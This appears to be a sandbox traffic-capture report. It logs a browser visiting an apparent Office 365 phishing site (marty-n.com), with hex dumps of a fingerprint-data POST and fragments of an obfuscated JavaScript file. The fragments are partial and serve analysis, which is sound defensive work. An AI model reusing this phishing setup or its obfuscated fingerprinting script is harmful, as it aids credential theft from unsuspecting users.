                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                              Host: r.bing.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1729887743&IPMH=35531570&IPMID=1707317782133
                                                                                                              2024-10-25 20:22:29 UTC1206INHTTP/1.1 200 OK
                                                                                                              Content-Type: text/css; charset=utf-8
                                                                                                              Server: Kestrel
                                                                                                              Access-Control-Allow-Headers: *
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Last-Modified: Tue, 11 Jun 2024 16:35:03 GMT
                                                                                                              X-EventID: 671056e1861c43c799f299dbe0b76222
                                                                                                              UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
                                                                                                              X-AS-InstrumentationOptions: AppServerLoggingMaster=1
                                                                                                              X-AS-MACHINENAME: BNZEEAP00016A2E
                                                                                                              X-AS-SuppressSetCookie: 1
                                                                                                              X-XSS-Protection: 0
                                                                                                              cross-origin-resource-policy: cross-origin
                                                                                                              nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.75}
                                                                                                              report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingrms"}]}
                                                                                                              Cache-Control: public, max-age=57223
                                                                                                              Expires: Sat, 26 Oct 2024 12:16:12 GMT
                                                                                                              Date: Fri, 25 Oct 2024 20:22:29 GMT
                                                                                                              Content-Length: 6
                                                                                                              Connection: close
                                                                                                              Alt-Svc: h3=":443"; ma=93600
                                                                                                              Akamai-GRN: 0.95200117.1729887749.412fc127
                                                                                                              Timing-Allow-Origin: *
                                                                                                              2024-10-25 20:22:29 UTC6INData Raw: 7a 7b 61 3a 31 7d
                                                                                                              Data Ascii: z{a:1}


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              24192.168.2.1649736185.45.66.1554431992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-10-25 20:23:31 UTC715OUTGET /o/?c3Y9bzM2NV8xX25vbSZyYW5kPU5XZDJRV2M9JnVpZD1VU0VSMTUwOTIwMjRVMTAwOTE1MTA= HTTP/1.1
                                                                                                              Host: marty-n.com
                                                                                                              Connection: keep-alive
                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                              Sec-Fetch-Dest: document
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                              2024-10-25 20:23:31 UTC179INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 25 Oct 2024 20:23:31 GMT
                                                                                                              Server: Apache
                                                                                                              Upgrade: h2,h2c
                                                                                                              Connection: Upgrade, close
                                                                                                              Content-Length: 4713
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              2024-10-25 20:23:31 UTC4713INData Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 59 6f 75 20 6e 65 65 64 20 74 6f 20 65 6e 61 62 6c 65 20 4a 61 76 61 53 63 72 69 70 74 20 74 6f 20 72 75 6e 20 74 68 69 73 20 61 70 70 2e 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 72 6f 6f 74 22 3e 0a 20
                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> </head> <body> <noscript>You need to enable JavaScript to run this app.</noscript> <div id="root">


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              25192.168.2.1649735185.45.66.1554431992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-10-25 20:23:31 UTC951OUTPOST /o/?c3Y9bzM2NV8xX25vbSZyYW5kPU5XZDJRV2M9JnVpZD1VU0VSMTUwOTIwMjRVMTAwOTE1MTA= HTTP/1.1
                                                                                                              Host: marty-n.com
                                                                                                              Connection: keep-alive
                                                                                                              Content-Length: 139187
                                                                                                              Cache-Control: max-age=0
                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                              Origin: https://marty-n.com
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                              Sec-Fetch-Dest: document
                                                                                                              Referer: https://marty-n.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPU5XZDJRV2M9JnVpZD1VU0VSMTUwOTIwMjRVMTAwOTE1MTA=
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                              2024-10-25 20:23:31 UTC16384OUTData Raw: 64 61 74 61 3d 25 37 42 25 32 32 73 63 72 65 65 6e 25 32 32 25 33 41 25 37 42 25 32 32 61 76 61 69 6c 57 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 61 76 61 69 6c 48 65 69 67 68 74 25 32 32 25 33 41 39 38 34 25 32 43 25 32 32 77 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 68 65 69 67 68 74 25 32 32 25 33 41 31 30 32 34 25 32 43 25 32 32 63 6f 6c 6f 72 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 70 69 78 65 6c 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 61 76 61 69 6c 4c 65 66 74 25 32 32 25 33 41 30 25 32 43 25 32 32 61 76 61 69 6c 54 6f 70 25 32 32 25 33 41 30 25 32 43 25 32 32 6f 72 69 65 6e 74 61 74 69 6f 6e 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 53 63 72 65 65 6e 4f 72 69 65
                                                                                                              Data Ascii: data=%7B%22screen%22%3A%7B%22availWidth%22%3A1280%2C%22availHeight%22%3A984%2C%22width%22%3A1280%2C%22height%22%3A1024%2C%22colorDepth%22%3A24%2C%22pixelDepth%22%3A24%2C%22availLeft%22%3A0%2C%22availTop%22%3A0%2C%22orientation%22%3A%22%5Bobject+ScreenOrie
                                                                                                              2024-10-25 20:23:31 UTC16384OUTData Raw: 44 25 32 32 25 32 43 25 32 32 58 4d 4c 44 6f 63 75 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 58 4d 4c 44 6f 63 75 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 57 72
                                                                                                              Data Ascii: D%22%2C%22XMLDocument%22%3A%22function+XMLDocument%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22WritableStreamDefaultWriter%22%3A%22function+WritableStreamDefaultWriter%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22WritableStreamDefaultController%22%3A%22function+Wr
                                                                                                              2024-10-25 20:23:31 UTC16384OUTData Raw: 32 32 25 32 43 25 32 32 53 56 47 41 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 53 56 47 41 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 52 65 73 70 6f 6e 73 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 52 65 73 70 6f 6e 73 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 53 69 7a 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 53 69 7a 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32
                                                                                                              Data Ascii: 22%2C%22SVGAElement%22%3A%22function+SVGAElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22Response%22%3A%22function+Response%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22ResizeObserverSize%22%3A%22function+ResizeObserverSize%28%29+%7B+%5Bnative+code%5D+%7D%22%2
                                                                                                              2024-10-25 20:23:31 UTC16384OUTData Raw: 25 32 43 25 32 32 48 54 4d 4c 4d 65 6e 75 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 4d 65 6e 75 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 4d 65 64 69 61 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 4d 65 64 69 61 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 4d 61 72 71 75 65 65 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 4d 61 72 71 75 65 65 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e
                                                                                                              Data Ascii: %2C%22HTMLMenuElement%22%3A%22function+HTMLMenuElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLMediaElement%22%3A%22function+HTMLMediaElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLMarqueeElement%22%3A%22function+HTMLMarqueeElement%28%29+%7B+%5Bn
                                                                                                              2024-10-25 20:23:31 UTC16384OUTData Raw: 6c 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 41 62 6f 72 74 53 69 67 6e 61 6c 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 41 62 6f 72 74 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 41 62 6f 72 74 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 6f 66 66 73 63 72 65 65 6e 42 75 66 66 65 72 69 6e 67 25 32 32 25 33 41 74 72 75 65 25 32 43 25 32 32 57 65 62 41 73 73 65 6d 62 6c 79 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 57 65 62 41 73 73 65 6d 62 6c 79 25 35 44 25 32 32 25 32 43 25 32 32 41 62 73 6f 6c 75 74 65
                                                                                                              Data Ascii: l%22%3A%22function+AbortSignal%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22AbortController%22%3A%22function+AbortController%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22offscreenBuffering%22%3Atrue%2C%22WebAssembly%22%3A%22%5Bobject+WebAssembly%5D%22%2C%22Absolute
                                                                                                              2024-10-25 20:23:31 UTC16384OUTData Raw: 63 74 69 6f 6e 2b 55 53 42 49 73 6f 63 68 72 6f 6e 6f 75 73 4f 75 74 54 72 61 6e 73 66 65 72 50 61 63 6b 65 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 55 53 42 49 73 6f 63 68 72 6f 6e 6f 75 73 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 55 53 42 49 73 6f 63 68 72 6f 6e 6f 75 73 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 55 53 42 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 55 53 42 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75
                                                                                                              Data Ascii: ction+USBIsochronousOutTransferPacket%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22USBIsochronousOutTransferResult%22%3A%22function+USBIsochronousOutTransferResult%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22USBOutTransferResult%22%3A%22function+USBOutTransferResu
                                                                                                              2024-10-25 20:23:31 UTC16384OUTData Raw: 69 6f 53 6f 75 72 63 65 4e 6f 64 65 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 53 74 72 65 61 6d 41 75 64 69 6f 44 65 73 74 69 6e 61 74 69 6f 6e 4e 6f 64 65 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 53 74 72 65 61 6d 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 53 6f 75 72 63 65 48 61 6e 64 6c 65 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 53 6f 75 72 63 65 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 52 65 63 6f 72 64 65 72 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 51 75 65 72 79 4c 69 73 74 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 51 75 65 72 79 4c 69 73 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 4c 69 73 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 45 72 72 6f 72 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 45 6e 63 72 79 70 74 65 64 45 76 65 6e
                                                                                                              Data Ascii: ioSourceNode%22%2C%22MediaStreamAudioDestinationNode%22%2C%22MediaStream%22%2C%22MediaSourceHandle%22%2C%22MediaSource%22%2C%22MediaRecorder%22%2C%22MediaQueryListEvent%22%2C%22MediaQueryList%22%2C%22MediaList%22%2C%22MediaError%22%2C%22MediaEncryptedEven
                                                                                                              2024-10-25 20:23:31 UTC16384OUTData Raw: 32 32 6f 6e 63 6f 6e 74 65 6e 74 76 69 73 69 62 69 6c 69 74 79 61 75 74 6f 73 74 61 74 65 63 68 61 6e 67 65 25 32 32 25 32 43 25 32 32 6f 6e 73 63 72 6f 6c 6c 65 6e 64 25 32 32 25 32 43 25 32 32 41 6e 69 6d 61 74 69 6f 6e 50 6c 61 79 62 61 63 6b 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 41 6e 69 6d 61 74 69 6f 6e 54 69 6d 65 6c 69 6e 65 25 32 32 25 32 43 25 32 32 43 53 53 41 6e 69 6d 61 74 69 6f 6e 25 32 32 25 32 43 25 32 32 43 53 53 54 72 61 6e 73 69 74 69 6f 6e 25 32 32 25 32 43 25 32 32 44 6f 63 75 6d 65 6e 74 54 69 6d 65 6c 69 6e 65 25 32 32 25 32 43 25 32 32 42 61 63 6b 67 72 6f 75 6e 64 46 65 74 63 68 4d 61 6e 61 67 65 72 25 32 32 25 32 43 25 32 32 42 61 63 6b 67 72 6f 75 6e 64 46 65 74 63 68 52 65 63 6f 72 64 25 32 32 25 32 43 25 32 32 42 61 63 6b
                                                                                                              Data Ascii: 22oncontentvisibilityautostatechange%22%2C%22onscrollend%22%2C%22AnimationPlaybackEvent%22%2C%22AnimationTimeline%22%2C%22CSSAnimation%22%2C%22CSSTransition%22%2C%22DocumentTimeline%22%2C%22BackgroundFetchManager%22%2C%22BackgroundFetchRecord%22%2C%22Back
                                                                                                              2024-10-25 20:23:31 UTC8115OUTData Raw: 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 43 44 41 54 41 53 65 63 74 69 6f 6e 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74 65 43 44 41 54 41 53 65 63 74 69 6f 6e 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 43 6f 6d 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74 65 43 6f 6d 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 44 6f 63 75 6d 65 6e 74 46 72 61 67 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72
                                                                                                              Data Ascii: 7B+%5Bnative+code%5D+%7D%22%2C%22createCDATASection%22%3A%22function+createCDATASection%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22createComment%22%3A%22function+createComment%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22createDocumentFragment%22%3A%22function+cr
                                                                                                              2024-10-25 20:23:33 UTC178INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 25 Oct 2024 20:23:32 GMT
                                                                                                              Server: Apache
                                                                                                              Upgrade: h2,h2c
                                                                                                              Connection: Upgrade, close
                                                                                                              Content-Length: 366
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              2024-10-25 20:23:33 UTC366INData Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 69 64 3d 27 68 74 6d 6c 27 20 73 74 69 3d 27 56 6c 5a 4f 52 6c 56 71 52 54 46 4e 52 47 74 35 54 55 52 4a 4d 46 5a 55 52 58 64 4e 52 47 74 34 54 6c 52 46 64 77 3d 3d 27 20 76 69 63 3d 27 27 20 6c 61 6e 67 3d 27 65 6e 27 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 6f 63 6b 65 74 2e 69 6f 2f 34 2e 37 2e 35 2f 73 6f 63 6b 65 74 2e 69 6f 2e 6d 69 6e 2e 6a 73 27 20 69 6e 74 65 67 72 69 74 79 3d 27 73 68 61 33 38 34 2d 32 68 75 61 5a 76 4f 52 39 69 44 7a 48 71 73 6c 71 77 70 52 38 37 69 73 45 6d 72 66 78 71 79 57 4f 46 37 68 72 37 42 59 36 4b 47 30 2b 68 56 4b 4c 6f 45 58 4d 50 55 4a 77 33 79 6e 57 75 68 4f 27 20 63 72
                                                                                                              Data Ascii: <!DOCTYPE html><html id='html' sti='VlZORlVqRTFNRGt5TURJMFZURXdNRGt4TlRFdw==' vic='' lang='en'><head> <script src='https://cdn.socket.io/4.7.5/socket.io.min.js' integrity='sha384-2huaZvOR9iDzHqslqwpR87isEmrfxqyWOF7hr7BY6KG0+hVKLoEXMPUJw3ynWuhO' cr


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              26192.168.2.1649738185.45.66.1554431992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-10-25 20:23:33 UTC592OUTGET /o/jsnom.js HTTP/1.1
                                                                                                              Host: marty-n.com
                                                                                                              Connection: keep-alive
                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                              Accept: */*
                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                              Sec-Fetch-Dest: script
                                                                                                              Referer: https://marty-n.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPU5XZDJRV2M9JnVpZD1VU0VSMTUwOTIwMjRVMTAwOTE1MTA=
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                              2024-10-25 20:23:33 UTC284INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 25 Oct 2024 20:23:33 GMT
                                                                                                              Server: Apache
                                                                                                              Upgrade: h2,h2c
                                                                                                              Connection: Upgrade, close
                                                                                                              Last-Modified: Mon, 30 Sep 2024 10:56:37 GMT
                                                                                                              ETag: "73b0b0c-1877d-623540f1918c2"
                                                                                                              Accept-Ranges: bytes
                                                                                                              Content-Length: 100221
                                                                                                              Content-Type: application/javascript
                                                                                                              2024-10-25 20:23:33 UTC7908INData Raw: 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 66 61 65 28 5f 30 78 33 34 62 61 31 39 2c 20 5f 30 78 35 39 38 62 31 38 29 20 7b 20 63 6f 6e 73 74 20 5f 30 78 35 39 65 62 30 35 20 3d 20 5f 30 78 35 39 65 62 28 29 3b 20 72 65 74 75 72 6e 20 5f 30 78 31 66 61 65 20 3d 20 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 66 61 65 35 39 2c 20 5f 30 78 33 39 31 66 64 35 29 20 7b 20 5f 30 78 31 66 61 65 35 39 20 3d 20 5f 30 78 31 66 61 65 35 39 20 2d 20 30 78 65 61 3b 20 6c 65 74 20 5f 30 78 63 62 63 31 36 39 20 3d 20 5f 30 78 35 39 65 62 30 35 5b 5f 30 78 31 66 61 65 35 39 5d 3b 20 72 65 74 75 72 6e 20 5f 30 78 63 62 63 31 36 39 3b 20 7d 2c 20 5f 30 78 31 66 61 65 28 5f 30 78 33 34 62 61 31 39 2c 20 5f 30 78 35 39 38 62 31 38 29 3b 20 7d 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33
                                                                                                              Data Ascii: function _0x1fae(_0x34ba19, _0x598b18) { const _0x59eb05 = _0x59eb(); return _0x1fae = function(_0x1fae59, _0x391fd5) { _0x1fae59 = _0x1fae59 - 0xea; let _0xcbc169 = _0x59eb05[_0x1fae59]; return _0xcbc169; }, _0x1fae(_0x34ba19, _0x598b18); }(function(_0x3
                                                                                                              2024-10-25 20:23:33 UTC8000INData Raw: 74 65 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 5c 78 32 30 61 75 74 6f 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 5c 78 32 30 61 75 74 6f 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 68 65 69 67 68 74 3a 5c 78 32 30 61 75 74 6f 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 74 6f 70 3a 5c 78 32 30 30 25 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32
                                                                                                              Data Ascii: te;\x0a\x20\x20\x20\x20\x20\x20\x20\x20margin-left:\x20auto;\x0a\x20\x20\x20\x20\x20\x20\x20\x20margin-right:\x20auto;\x0a\x20\x20\x20\x20\x20\x20\x20\x20height:\x20auto;\x0a\x20\x20\x20\x20\x20\x20\x20\x20margin-top:\x200%;\x0a\x20\x20\x20\x20\x20\x20\x2
                                                                                                              2024-10-25 20:23:33 UTC8000INData Raw: 69 6e 67 3a 5c 78 32 30 6e 6f 72 6d 61 6c 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 77 6f 72 64 2d 73 70 61 63 69 6e 67 3a 5c 78 32 30 6e 6f 72 6d 61 6c 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 61 70 70 65 61 72 61 6e 63 65 3a 5c 78 32 30 74 65 78 74 66 69 65 6c 64 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 5c 78 32 30 2d 69 6e 74 65 72 6e 61 6c 2d 6c 69 67 68 74 2d 64 61 72 6b 28 72 67 62 28 32 35 35 2c 5c 78 32 30 32 35 35 2c 5c 78 32 30 32 35 35 29 2c 5c 78 32 30 72 67 62 28 35 39 2c 5c 78 32 30 35
                                                                                                              Data Ascii: ing:\x20normal;\x0a\x20\x20\x20\x20\x20\x20\x20\x20word-spacing:\x20normal;\x0a\x20\x20\x20\x20\x20\x20\x20\x20appearance:\x20textfield;\x0a\x20\x20\x20\x20\x20\x20\x20\x20background-color:\x20-internal-light-dark(rgb(255,\x20255,\x20255),\x20rgb(59,\x205
